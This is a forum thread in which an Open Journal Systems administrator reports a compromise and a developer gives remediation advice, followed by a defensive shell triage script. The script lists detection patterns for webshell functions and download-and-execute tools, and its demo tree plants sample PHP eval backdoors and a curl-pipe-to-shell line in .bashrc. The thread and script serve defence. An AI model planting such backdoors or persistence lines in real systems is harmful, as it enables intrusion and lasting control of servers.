Hello OJS team,
We are encountering a security issue affecting our journal on OJS 3.3.0.17. Issues titled “lol POC” are being published automatically. Searching for this string in Google, I found many other OJS journals with this exact issue title, indicating that we are not alone.
We disabled all editor and manager roles except a few trusted ones and reset their passwords to strong keys, but the problem reoccurred. This seems unrelated to specific OJS versions, as we’ve found journals from OJS 3.1.0 up through 3.4.0.7 experiencing the same issue. So, we’re not certain if an update alone will resolve it.
I checked folder permissions and they have not been changed. The files folder is not web-accessible.
Could you advise on this problem?
Thank you for your support.
Hi @alirezaaa!
I’d say the starting point of this problem is weak journal manager passwords. Once someone has access to such an account, it becomes pretty easy to do bad things; that’s why I’ve created this discussion: Protection against compromised accounts · pkp/pkp-lib · Discussion #11084 · GitHub.
Once a system is compromised, a hacker may add a lot of alternative ways to keep/restore access to your machine.
You have to disconnect the internet from your server and ensure ALL of those tricks have been removed.
As an example, they can include bad code in the files of your application, include auto-executing code in places like the CRON scheduler/startup scripts (e.g. `~/.bashrc`), create new .php files and leave them in hideous places, etc.
I’d recommend you to:
- Create a new server and discard the old one (unless your team is skilled enough to identify and remove all threats)
- Bring only the database + public folder + files_dir
- Check the best practices at the PKP site (e.g. leaving the files_dir in a publicly accessible place is going to create problems for you): https://docs.pkp.sfu.ca/admin-guide/en/securing-your-system (this link will be updated soon with more useful information)
- Look for problems in the database, a smart attacker might attempt to leave code to re-gain access also inside the database (e.g. normally `<script>` tags).
- Change the passwords of accounts that have too much privilege: the admin account and the journal managers
Also see: https://pkp.sfu.ca/2025/10/15/keep-your-ojs-installation-secure-with-updates/
Best,
Jonas Raoni
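As an added example of the checks described in the reply above (this is not PKP/OJS code and not part of the original thread), here is a small POSIX shell triage script. It looks for PHP files inside upload directories, greps the application tree for webshell-style constructs, diffs the live install against a freshly unpacked copy of the same release, greps startup/cron files for download-and-execute patterns, and prints SQL for the database checks. The OJS table and column names in the SQL (`journal_settings`, `publication_settings`, `user_user_groups`, role IDs 1 and 16 for site admin and manager) are assumptions to verify against your own schema; the sample directory tree it builds is constructed here purely for demonstration.

```shell
#!/bin/sh
# Post-compromise triage helpers for an OJS install (added example, not PKP code).
# Usage after sourcing:  grep_suspicious_php /var/www/ojs
#                        find_php_in_upload_dirs /var/ojs-files /var/www/ojs/public
#                        diff_against_clean /tmp/ojs-3.3.0-17 /var/www/ojs
#                        grep_persistence /etc/crontab /etc/cron.d/* ~/.bashrc ~/.profile

# PHP constructs that rarely appear in legitimate OJS code but are typical of
# webshells. Hits still need manual review; this is a triage list, not a verdict.
SUSPICIOUS_PHP='(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13|shell_exec|passthru|proc_open|popen)[[:space:]]*\('

# Download-and-execute patterns that do not belong in cron or shell startup files.
SUSPICIOUS_PERSIST='(curl|wget|/dev/tcp|nc |ncat|socat|base64 -d|python[0-9.]* -c|perl -e|php -r)'

# 1. No PHP at all should live under files_dir or public/ (user uploads).
find_php_in_upload_dirs() {
    for d in "$@"; do
        find "$d" -type f \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.phar' \) 2>/dev/null
    done
}

# 2. Application files containing webshell-style constructs.
grep_suspicious_php() {
    find "$1" -type f -name '*.php' -exec grep -lE "$SUSPICIOUS_PHP" {} + 2>/dev/null \
        || [ $? -eq 1 ]   # "nothing found" is not an error
}

# 3. Every file that differs from, or does not exist in, a clean unpacked release.
#    config.inc.php and cache/ will always show up; everything else is suspect.
diff_against_clean() {
    diff -rq "$1" "$2" || [ $? -eq 1 ]
}

# 4. Persistence in cron, rc and shell startup files.
grep_persistence() {
    grep -nE "$SUSPICIOUS_PERSIST" "$@" || [ $? -eq 1 ]
}

# 5. Database checks: injected markup in settings tables and privileged accounts.
#    Table/column names and role IDs (1 = site admin, 16 = manager) are assumed.
db_audit_sql() {
    for t in site_settings journal_settings issue_settings publication_settings \
             submission_settings announcement_settings navigation_menu_item_settings; do
        printf "SELECT '%s' AS tbl, setting_name, LEFT(setting_value, 200) FROM %s WHERE setting_value LIKE '%%<script%%' OR setting_value LIKE '%%<iframe%%' OR setting_value LIKE '%%javascript:%%';\n" "$t" "$t"
    done
    cat <<'EOF'
SELECT u.user_id, u.username, u.email, u.date_registered, ug.role_id
FROM users u
JOIN user_user_groups uug ON uug.user_id = u.user_id
JOIN user_groups ug ON ug.user_group_id = uug.user_group_id
WHERE ug.role_id IN (1, 16)
ORDER BY u.date_registered DESC;
EOF
}

# Constructed sample tree (demonstration data only): a clean copy, and a live
# copy with a backdoored library file, a dropper under the uploads, and a
# poisoned .bashrc.
make_sample_tree() {
    st_root="$1"
    mkdir -p "$st_root/clean/lib" "$st_root/live/lib" "$st_root/live/files/journals/1/articles/5"
    printf '<?php\nrequire("lib/boot.php");\n' > "$st_root/clean/index.php"
    cp "$st_root/clean/index.php" "$st_root/live/index.php"
    printf '<?php\nfunction boot() {}\n' > "$st_root/clean/lib/boot.php"
    printf '<?php\nfunction boot() {}\n@eval(base64_decode($_POST["k"]));\n' > "$st_root/live/lib/boot.php"
    printf '<?php @eval($_REQUEST["c"]);\n' > "$st_root/live/files/journals/1/articles/5/thumb.php"
    printf 'export PATH=$PATH:~/bin\ncurl -s http://example.invalid/x.sh | sh\n' > "$st_root/live/.bashrc"
}

triage_demo() {
    demo_root=$(mktemp -d)
    make_sample_tree "$demo_root"
    echo "== PHP under upload dirs";      find_php_in_upload_dirs "$demo_root/live/files"
    echo "== webshell constructs";        grep_suspicious_php "$demo_root/live"
    echo "== diff against clean release"; diff_against_clean "$demo_root/clean" "$demo_root/live"
    echo "== persistence";                grep_persistence "$demo_root/live/.bashrc"
    echo "== SQL to run against the DB";  db_audit_sql
    rm -rf "$demo_root"
}

[ "${1:-}" = "demo" ] && triage_demo
```

Run it with `sh triage.sh demo` to see the findings on the constructed tree, or source it and point the functions at the real install. The diff step is the most reliable of the file checks: download the exact release tarball you are running, unpack it, and anything that differs or exists only on the live side is either local configuration or something the attacker left behind.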
thank you @jonasraoni ,
I will check and keep this thread updated.
Great! FYI we’ll release new versions soon.
Best,
Jonas Raoni